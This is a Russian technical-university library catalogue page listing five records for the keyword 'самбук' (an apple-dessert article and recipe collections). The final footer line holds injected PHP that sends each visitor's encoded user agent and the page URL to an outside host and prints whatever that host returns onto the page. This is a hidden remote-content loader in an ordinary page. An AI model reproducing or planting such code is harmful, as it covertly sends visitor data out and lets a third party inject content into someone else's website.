Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

45 пользователей


Зарегистрированных: 2 

Зюзькова Ольга Николаевна

Смаилов Асылбек Елубаевич


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=САМБУК")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 5
1. 
Хранение и переработка сельхозсырья. - Журнал, 2010г. № 8
Оглавление 
  • Саломатин, В. А. О стратегии развития табачной отрасли в Российской Федерации / В. А. Саломатин. - с.8-10
  • Филатов, В. В. Исследования плотности энергетического облучения на плоской поверхности от инфракрасных излучателей с индивидуальным параболическим отражателем / В. В. Филатов. - с.11-13
  • Исследование форм связи влаги в семенах амаранта сорта Ультра методом дифференциально-термического анализа. - с.14-16
  • Баженова, Б. А. Влияние биохимических изменений в электростимулированной конине на формирование технологических свойств сырья / Б. А. Баженова, Т. М. Бадмаева, Ф. А. Мадагаев. - с.16-19
  • Васильева, И. Г. Эффективность хранения сельскохозяйственных продуктов на объектах общественного питания / И. Г. Васильева. - с.19-21
  • Негматуллоева, Р. Н. Сушка плодов дикорастущего шиповника / Р. Н. Негматуллоева, Г. Н. Дубцова, С. В. Савченко. - с.22-24
  • Забавин, И. С. Исследование диффузионных свойств зерна / И. С. Забавин, С. П. Рудобашта, В. М. Дмитриев. - с.24-28
  • Голубева, Л. В. Влияние комплексной пищевой добавки на качественные показатели белковых продуктов / Л. В. Голубева, Л. Э. Глаголева, Г. М. Смольский. - с.29-31
  • Выродов, Д. А. Визуально-спектрофотометрические методы оценки и сортировки плодов томата на стадии разной степени зрелости / Д. А. Выродов, Е. Д. Жужа. - с.31-37
  • Магомедов, Г. О. Желейный мармелад функционального назначения с ягодами малины и садовой земляники / Г. О. Магомедов, Л. А. Лобосова, И. Х. Арсанукаев. - с.37-39
  • Николаев, Б. Л. Вязкостно-скоростные характеристики яблочной подварки / Б. Л. Николаев, А. Ф. Денисенко, Л. К. Николаев. - с.39
  • Федотова, О. Б. Оценка качества упаковочных материалов для молочных продуктов / О. Б. Федотова, А. Ю. Золотин. - с.40-43
  • Влияние стимулятора биосинтеза этанола - геотермальной воды на морфофизиологические особенности дрожжей Saccharomyces cerevisiae в различных условиях культивирования. - с.44-46
  • Бурмистров, Г. П. Разработка технологии производства специальных продуктов функционального назначения для питания раненых / Г. П. Бурмистров, О. А. Камбаров, О. Ф. Фазуллина. - с.47-49
  • Повышение комплексообразующей способности пектинсодержащих порошковых продуктов. - с.49-51
  • Микробиологические и физико-химические показатели нового диетического продукта самбук яблочный. - с.51-53
  • Изучение кинетики проращивания зернобобовых культур в активированных средах. - с.54-55
  • Технологические аспекты получения железообогащающей пищевой добавки Е381. - с.56-57
  • Внедрение турбокомпрессорных агрегатов Ш2-МБКА в пневмотранспортные системы хлебозаводов. - с.58-61
Держатели документа (Информация об экземплярах) 
2. 
Десерты и напитки [Текст] / сост. Е. В. Шиш ; дар. В. А. Козлова, 1995. - 490, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
4. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
5. 
Абатуров, Павел Васильевич. Сладкие блюда. Напитки [Текст] / П. В. Абатуров, Н. П. Цыпленков, 1958. - 136 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2874 - 23.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.70 с.14 запросов, 0.45c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;